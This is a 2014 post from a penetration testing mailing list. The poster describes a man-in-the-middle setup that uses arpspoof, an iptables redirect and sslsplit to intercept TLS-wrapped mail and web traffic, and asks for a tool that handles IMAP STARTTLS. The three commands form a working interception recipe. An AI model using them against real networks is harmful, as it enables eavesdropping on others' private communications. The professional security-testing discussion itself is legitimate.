Penetration Testing mailing list archives

IMAP STARTTLS sniff tool

From: "Bob Ezrin" <bezrin () gmx com>
Date: Fri, 07 Mar 2014 10:29:59 +0100

Hi all. 
We managed succesfully to sniff inside POP3S, SMTPS, IMAPS & HTTPS tunnels using:

arpspoof -r DEFAULT_GATEWAY -t VICTIM

iptables -t nat -A PREROUTING -p tcp --dport ORIGIN_PORT -j REDIRECT --to-port REDIRECT_PORT

sslsplit SOME_PARAMS ssl 0.0.0.0 REDIRECT_PORT

to make man-in-the-middle. 

Now we want to sniff inside STARTTLS tunnels (specifically IMAP) but unfortunately sslsplit doesn't supports STARTTLS. 
Here there is the TODO list for sslsplit https://github.com/droe/sslsplit/blob/master/TODO

Is there/do you know another SSL/TLS tool supporting IMAP over STARTTLS to make make-in-the-middle? 

Many thanks 
B.

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified. 

http://www.iacertification.org
------------------------------------------------------------------------

Current thread:

IMAP STARTTLS sniff tool Bob Ezrin (Mar 07)
- <Possible follow-ups>
- IMAP STARTTLS sniff tool Bob Ezrin (Mar 07)